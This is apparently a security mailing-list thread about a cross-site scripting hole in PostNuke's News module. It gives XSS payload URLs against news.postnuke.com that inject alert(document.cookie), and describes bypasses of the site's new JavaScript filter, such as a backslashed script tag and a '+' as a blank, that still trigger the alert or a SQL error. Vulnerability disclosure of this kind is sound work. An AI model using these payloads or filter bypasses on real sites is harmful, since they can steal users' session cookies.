I just checked it again :
http://news.postnuke.com/modules.php?op=modload&name=News&file=article&sid=alert(document.cookie);
where + denotes a blank space or similarly this one:
http://news.postnuke.com/modules.php?op=modload&name=News&file=article&sid=alert(document.cookie);
resulting in Sorry - $HTTP_GET_VARS contains javascript... Msg.
However the request:
?op=modload&name=News&file=article&sid=<\script>alert(document.cookie);
or any character inserted before first "script" and after first less than "<"
resulting in DB Error, revealing nothing (user/pass/path etc).
But I used I.E and Netscape, maybe it's different with other browsers. :)
Regards
Muhammad Faisal Rauf Danka
Head of GemSEC / Chief Technology Officer
Gem Internet Services (Pvt) Ltd.
web: www.gem.net.pk
Key Id: 0x784B0202
Key Fingerprint: 6F8C EDCF 6C6E 06A5 48D7 6A20 C592 484B
784B 0202
--- Daniel Woods <[EMAIL PROTECTED]> wrote:
>
>Humm!
>
>> on 26th Sep the following url:
>> http://news.postnuke.com/modules.php
>>
>?op=modload&name=News&file=article&sid=alert(document.cookie);
>>
>> used to give Alert PopUp and
>> Error:
>> DB Error: getArticles: 1064: You have an error in your SQL syntax near '='
>> at line 23
>>
>> now it gives:
>> Sorry - $HTTP_GET_VARS contains javascript...
>>
>> Prompt fix by PostNuke team, great work Keep it up! :)
>
>Not so fast on the praise :(
>
>It only took me a couple of workarounds to find ways to bypass the check.
>
> http://news.postnuke.com/modules.php
>
>?op=modload&name=News&file=article&sid=alert(document.cookie);
>
>Using the request...
>
>?op=modload&name=News&file=article&sid=<\script>alert(document.cookie);
>gives me the DB Error: message
>
>And using the request...
>
>?op=modload&name=News&file=article&sid=alert(document.cookie);
>gives me the Alert Popup and DB Error: message... the '+' is treated as a blank.
>
>Thanks... Dan.
_
---
[ATTITUDEX.COM]
http://www.attitudex.com/
---
_
Select your own custom email address for FREE! Get [EMAIL PROTECTED] w/No Ads, 6MB,
POP & more! http://www.everyone.net/selectmail?campaign=tag